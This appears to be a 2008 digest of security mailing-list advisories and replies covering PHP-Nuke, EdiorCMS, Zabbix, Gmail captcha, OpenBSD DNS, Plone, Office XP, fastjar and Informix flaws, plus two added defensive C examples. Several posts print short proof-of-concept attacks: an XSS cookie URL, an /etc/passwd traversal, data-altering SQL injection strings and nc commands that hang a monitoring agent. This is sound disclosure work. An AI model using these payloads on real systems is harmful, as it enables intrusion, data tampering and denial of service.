Re: Directory traversal and DoS in WinIPDS G52-33-021
The listed issues have been resolved in version G52-33-022. See release note here: http://www.intermate.com/winIPDS_support
Re: PHP-Nuke Module NukeC30 sql injection
Don't copy http://www.secumania.org/exploits/web-applications/php~nukec30-sql-injection-vulnerability-2008030742897/
XSS in PHP-Nuke (eWeather module)
//XSS in PHP-Nuke (eWeather module)

PHP-Nuke (http://phpnuke.org):
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.

eWeather module (http://www.janitorialservice.us):
Weather module based on eWeather.biz data with 3 additional blocks 2 side and one center block.

///Details
From source-code of /modules/eWeather/index.php
    Line 35: $zipCode=$chart;
    Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";
chart variable is unvalidated.

///Exploit
http://example.net/modules.php?name=eWeather&chart=[XSS]
http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E

///Fix
Change line 35 to
    $zipCode=(int)$chart;

///Author:
NetJackal
http://netjackal.by.ru
http://hackerz.ir
Directory traversal in EdiorCMS V3.0
Directory traversal in EdiorCMS V3.0

Application: EdiorCMS V3.0
Vendor: http://www.edior.com
Versions: 3.0
Platforms: ALL
Bug: Directory traversal
Exploitation: remote
Date: 13 Mar 2008
Author: Shennan Wang
e-mail: [EMAIL PROTECTED]

POC:
http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd
Zabbix (zabbix_agentd) denial of service
Hello,

There is some DoS issue with zabbix which can be exploited by a malicious user from an authorized host. An attacker on the authorized host can cause the zabbix_agentd to hang, overconsuming CPU resources.

This can be triggered by sending the agent a file checksum request (vfs.file.cksum[file]) with file argument being some special device node like /dev/zero or /dev/urandom (the latter raises kernel CPU usage even more). If the malicious user sends number_of_zabbix_agentd_children requests, then the zabbix_agentd service will not be able to serve any requests until it's restarted.

Here's an example session:

    gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 &
    [1] 24429
    gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 &
    [2] 24431
    gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 &
    [3] 24433
    gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 &
    [4] 24435

...and some output from top:

    snip
    Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie
    Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
    snip
      PID USER    PR NI VIRT  RES SHR S %CPU %MEM   TIME+ COMMAND
    24381 zabbix  30  5 5056 1032 768 R   65  0.1 4:16.01 zabbix_agentd
    24382 zabbix  30  5 5068 1044 776 R   50  0.1 4:12.18 zabbix_agentd
    24380 zabbix  30  5 5068 1044 776 R   50  0.1 4:01.24 zabbix_agentd
    24379 zabbix  30  5 5056 1036 772 R   31  0.1 4:08.24 zabbix_agentd

zabbix_agentd accepts new connections, but does not serve them.

The malicious user needs to connect from an authorized host, but it's not so hard to spoof it if he's on the same ethernet segment as the host running the zabbix_agent.
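The report above comes down to a checksum item that reads until end-of-file on a path that never ends. The following is an added example, not part of the original post and not Zabbix code: a checksum helper that refuses anything other than a regular file and never reads past the size it vetted. The function name, the 64 MiB cap and the Adler-32 stand-in checksum are assumptions made for the illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed policy cap on how much one checksum request may read. */
#define CKSUM_MAX_BYTES (64L * 1024 * 1024)

enum { CKSUM_OK = 0, CKSUM_EOPEN = -1, CKSUM_ENOTREG = -2,
       CKSUM_ETOOBIG = -3, CKSUM_EREAD = -4 };

/* Hypothetical helper: checksum `path` only if it is a bounded regular file. */
int guarded_file_cksum(const char *path, uint32_t *out)
{
    /* O_NONBLOCK keeps open() from blocking on FIFOs and similar nodes. */
    int fd = open(path, O_RDONLY | O_NONBLOCK);
    if (fd < 0)
        return CKSUM_EOPEN;

    /* fstat() the descriptor, not the path, so the object that is checked
       is the object that is read (no check/use race). */
    struct stat st;
    if (fstat(fd, &st) != 0) { close(fd); return CKSUM_EOPEN; }
    if (!S_ISREG(st.st_mode)) { close(fd); return CKSUM_ENOTREG; }
    if (st.st_size > CKSUM_MAX_BYTES) { close(fd); return CKSUM_ETOOBIG; }

    uint32_t a = 1, b = 0;          /* Adler-32, a stand-in checksum */
    unsigned char buf[4096];
    off_t left = st.st_size;        /* never read past the size we vetted */
    while (left > 0) {
        size_t want = left < (off_t)sizeof buf ? (size_t)left : sizeof buf;
        ssize_t n = read(fd, buf, want);
        if (n < 0) {
            if (errno == EINTR) continue;
            close(fd);
            return CKSUM_EREAD;
        }
        if (n == 0) break;          /* file shrank while being read */
        for (ssize_t i = 0; i < n; i++) {
            a = (a + buf[i]) % 65521;
            b = (b + a) % 65521;
        }
        left -= n;
    }
    close(fd);
    *out = (b << 16) | a;
    return CKSUM_OK;
}

int main(void)
{
    /* Device nodes named in the report, plus one ordinary file. */
    const char *paths[] = { "/dev/zero", "/dev/urandom", "/etc/hostname" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        uint32_t sum = 0;
        int rc = guarded_file_cksum(paths[i], &sum);
        printf("%-14s rc=%d sum=%08x\n", paths[i], rc, (unsigned)sum);
    }
    return 0;
}
```

A per-request time limit in the worker is a useful second bound, since a regular file on a stalled network mount can still hold a reader for a long time.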
Rise of the spammers
Hi,

According to the following press release of MessageLabs:
http://www.messagelabs.com/resources/press/11351
the proportion of spam from Gmail increased two-fold from 1.3 percent in January to 2.6 percent in February

Recently, researchers at Websense also spotted ITW (http://www.websense.com/securitylabs/blog/blog.php?BlogID=174) a bot trying to break Gmail's image captcha, with relative success though. So it seems pretty clear that spammers are abusing legal services to spread their stuff although it is not so clear how they are doing so.

AFAIK nobody has paid attention to Gmail's audio captcha as attack vector. This captcha turns out to be extremely weak against simple Fourier analysis so you can easily achieve a success rate of 90% even without implementing a HMM or any other well-known classifier.

You can read the technical details in the following post
http://blog.wintercore.com/?p=11

Video:
http://blog.wintercore.com/files/breaking_gmail_audio_captcha.wmv

Regards,
Rubén.
--
Wintercore
Agustin de Betancourt, 21. 8th Floor.
28003 Madrid. Spain.
Phone: +(34) 91 395 63 40
www.wintercore.com
Re: Firewire Attack on Windows Vista
Steve Shockley wrote:
> Stefan Kanthak wrote:
>> 2. The typical user authentication won't help, we're at hardware level here, and no OS needs to be involved.
>
> So, if I understand you correctly, if I boot my machine into DOS the memory can be read over Firewire?

If DMA is enabled on the firewire interface it's possible! If the BIOS allows to boot from a firewire device then it will setup the hardware!

> Or does the machine need a Firewire driver loaded to be vulnerable?

If the BIOS does not setup the firewire interface then some driver has to do it. So: it depends.

You can also read the memory if you shut down but don't power off your system. Typically drivers leave their devices in working condition.

Stefan
Re: Re: VHCS = 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
How can we fix this bug in the VHCS source code?
Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability
Hello ml,

I would like to point out that this vulnerability (Microsoft Internet Explorer FTP Command Injection Vulnerability) was published a long time ago, here is the advisory:
http://www.securityfocus.com/archive/1/383722

Cheers,
kralor
Update+Errata: Re: A paper by Amit Klein (Trusteer): OpenBSD DNS Cache Poisoning and Multiple O/S Predictable IP ID Vulnerability
Update+Errata for OpenBSD DNS Cache Poisoning and Multiple O/S Predictable IP ID Vulnerability
(http://www.trusteer.com/docs/OpenBSD_DNS_Cache_Poisoning_and_Multiple_OS_Predictable_IP_ID_Vulnerability.pdf)

Update
******

OpenBSD
=======
Apparently the OpenBSD team changed their mind (again...) and have now incorporated a fix for the DNS server transaction ID predictability, and the IP ID predictability, in the OpenBSD 4.3 branch. The solution in both cases resembles that of DragonFlyBSD and NetBSD. It seems that OpenBSD does not plan to address the DNS resolver transaction ID predictability though.

FreeBSD
=======
As expected, FreeBSD 7.0 was announced recently without a fix. This was communicated beforehand by the FreeBSD team and stated in the original paper.

DragonFlyBSD
============
DragonFlyBSD 1.12.0 is the first BSD operating system to roll out a solution to the IPv4 issue as part of the official version.

Apple MacOS X 10.5.2, MacOS X Server 10.5.2, Darwin 9.2 (all sharing the same kernel: xnu-1228.3.13)
=======
Apple did NOT fix the predictable IP ID issue in its products (in Leopard 10.5.2).

IPv6
====
None of the vendors addressed the similar issues in IPv6.

Misc.
=====
NetBSD has not addressed the issue in the RPC XID code.

Errata
******

The original paper mentioned that MacOS X has a particular implementation bug wherein it always sets seed=0. However, this is not accurate. The tmp variable changes each time ip_randomid() is called, and thus it is not guaranteed that seed=0. Nevertheless, it can be easily shown that seed=0 in about 50% of the key intervals. This is because at the re-keying time, tmp has probability of around 50% to have its higher 16 bits 0. So the Mac/Darwin platform remains particularly vulnerable.

Thanks,
-Amit
CTO, Trusteer

Amit Klein wrote:

Hello BugTraq

Recently I've been looking at the OpenBSD PRNG implementation for DNS transaction ID (OpenBSD ported BIND 9 into their code tree, but rolled their own PRNG for the DNS transaction ID field). I discovered a serious weakness in OpenBSD's PRNG, which allows an attacker to predict the next transaction ID (typically up to 8-10 guesses) given a series of consecutive 12-15 transaction IDs. As you may appreciate, this enables DNS cache poisoning for OpenBSD much like my earlier attacks on BIND 9, BIND 8 and Microsoft Windows DNS server.

Interestingly enough, OpenBSD uses a flavor of this PRNG for another field, this time the IP fragmentation ID, part of the OpenBSD kernel network stack. The analysis carries out quite similarly to show that OpenBSD's IP ID is predictable as well, which gives way to O/S fingerprinting, idle-scanning, host alias detection, traffic analysis, and in some cases, even to TCP blind data injection.

But it gets more interesting. Several other BSD operating systems copied the OpenBSD code for their own IP ID PRNG, so they're vulnerable too. This is particularly so with Apple's Mac OS X, Mac OS X Server and Darwin, but also with NetBSD, FreeBSD and DragonFlyBSD (the 3 latter O/S however only use this PRNG when the kernel flag net.inet.ip.random_id is set to 1; it is 0 by default, resulting in a sequential counter to be used instead...). OpenBSD, NetBSD and FreeBSD also use this PRNG for IP fragmentation ID normalization feature (e.g. scrub out random-id) in the packet filter module.

Somewhat more distant flavors are used for various IPv6 fields across many BSD operating systems, which may be affected, and some other O/S not mentioned here, including possibly non-BSD O/S may be affected, since this code seems to have been extensively copied and modified.

All the above mentioned vendors were contacted November 2007. FreeBSD, NetBSD and DragonFlyBSD committed a fix to their respective source code trees. OpenBSD decided not to fix, and Apple refused to provide any schedule for such fix.

The full paper is available at the following URL:
http://www.trusteer.com/docs/dnsopenbsd.html

The impact per O/S is summarized below:

* OpenBSD 3.3-4.2
  o DNS server cache poisoning (predictable DNS transaction ID).
* OpenBSD 2.6-4.2
  o Idle-scanning, O/S fingerprinting, host alias detection, traffic analysis, TCP blind data injection, etc. (predictable IP fragmentation ID) in regular IP packets and raw IP packets.
  o Predictable IP fragmentation ID in Ethernet-inside-IP encapsulation, IP-inside-IP encapsulation, the CARP protocol, IP multicast routing, pfsync interface protocol, packet filter (IP packet normalization), and network bridge (ICMP error packets).
* OpenBSD 2.5-4.2
  o libc resolver predictable DNS transaction ID (the source UDP port is random though).
* Mac OS X 10.0-10.5.1, Mac OS X Server 10.0-10.5.1, Darwin 1.0-9.1
  o Idle-scanning, O/S fingerprinting, host alias detection, traffic analysis, TCP blind data injection, etc. (predictable IP fragmentation ID) in regular IP packets and
Re: Re: Re: VHCS = 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
You cannot fix it without re-designing the VHCS security model. The exploit is a simple example of the many many attack vectors that exist in the flawed design. If you fix this particular exploit it would be simple to create additional ones.

To properly fix the security model of vhcs the following must be done:

The vhcs php files must not be owned by www, and they must run as a privileged user (suexec).

Also the .htaccess management portion of vhcs is buggy and needs to be disabled or fixed. Look at how it handles creating files and modifying files. It opens them and creates them as root, leaving it open for a symlink attack.

It gives me regret that after I give this to Wabisabilabi it appears public after 1 month, before Wabisabilabi even posts it for sale.
PR08-02: Plone CMS Security Research - the Art of Plowning
PR08-02: Plone CMS Security Research: the Art of Plowning

Product description:
Plone is a ready-to-run content management system built on the powerful, and free, Zope application server. Plone is easy to set up, extremely flexible, and provides you with a system for managing web content that is ideal for project groups, communities, web sites, extranets and intranets. Plone is designed with security in mind by addressing the 10 most common security vulnerabilities in web applications (OWASP Top 10).

Summary of issues identified:
- CSRF (Cross-site Request Forgeries)
- Credentials (username and password) stored in cookies
- Lack of authentication state on the server side
- Session cookies never, ever change (even after user password is changed or user logs out!)

Full details can be found here:
http://www.procheckup.com/Hacking_Plone_CMS.pdf

Legal:
Copyright 2008 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Office XP Remote SQL Injection
Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--
Shoutz: Aura, Null, Kinglet

Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Advisory: http://forum.aria-security.com/showthread.php?p=21

PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]

Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--

List of columns
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age

Aria-Security Team
The-0utl4w
[ MDVSA-2008:066 ] - Updated gcc packages fix directory traversal vulnerability in fastjar
Mandriva Linux Security Advisory MDVSA-2008:066
http://www.mandriva.com/security/

Package : gcc
Date    : March 13, 2008
Affected: 2007.0, Corporate 4.0

Problem Description:

Jurgen Weigert found a directory traversal vulnerability in fastjar versions prior to 0.93. This vulnerability allows user-assisted attackers to overwrite arbitrary files via a .jar file containing filename with ../ sequences.

The updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619

Updated Packages:

Mandriva Linux 2007.0
Mandriva Linux 2007.0/X86_64
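The advisory above concerns archive entry names containing ../ sequences. The following is an added example, not part of the advisory and not fastjar's code: a check an extractor can run on each entry name before creating the output file. The function names and the sample entry names are constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical check: returns 1 if the entry name cannot leave the
   extraction root, 0 otherwise. Any ".." component is refused, even one
   that would resolve back inside the root (e.g. "a/../b"). */
int entry_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (name[0] == '/')                 /* absolute path */
        return 0;

    const char *p = name;
    while (*p) {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);
        /* Compare whole components, so "..hidden" and "a..b" stay legal. */
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return 0;
        p += len;
        if (*p == '/')
            p++;
    }
    return 1;
}

/* Builds "<root>/<name>" into out only for safe names.
   Returns 0 on success, -1 for an unsafe name, -2 if the path would be
   truncated (a truncated path is refused, never used). */
int build_extract_path(const char *root, const char *name,
                       char *out, size_t outlen)
{
    if (!entry_name_is_safe(name))
        return -1;
    int n = snprintf(out, outlen, "%s/%s", root, name);
    if (n < 0 || (size_t)n >= outlen)
        return -2;
    return 0;
}

int main(void)
{
    /* Constructed entry names, as they might appear in an archive listing. */
    const char *entries[] = {
        "META-INF/MANIFEST.MF", "com/example/App.class",
        "../../home/user/.profile", "lib/../../outside.txt",
        "/etc/cron.d/job", "..hidden/notes.txt",
    };
    char path[256];
    for (size_t i = 0; i < sizeof entries / sizeof entries[0]; i++) {
        int rc = build_extract_path("/tmp/unpack", entries[i],
                                    path, sizeof path);
        printf("%-28s %s\n", entries[i], rc == 0 ? path : "REFUSED");
    }
    return 0;
}
```

The name check does not cover an archive that first creates a symbolic link inside the root and then writes through it; an extractor also has to refuse to follow links it did not create itself.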
ZDI-08-012: IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability
ZDI-08-012: IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-012
March 13, 2008

-- CVE ID:
CVE-2008-0727

-- Affected Vendors:
IBM

-- Affected Products:
IBM Informix

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5725. For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of IBM's Informix Dynamic Server. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide an overly long password and overflow a stack based buffer resulting in arbitrary code execution.

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More details can be found at:
http://www-1.ibm.com/support/docview.wss?uid=swg1IC55210
http://www-1.ibm.com/support/docview.wss?uid=swg1IC55209

-- Disclosure Timeline:
2007-11-07 - Vulnerability reported to vendor
2008-03-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/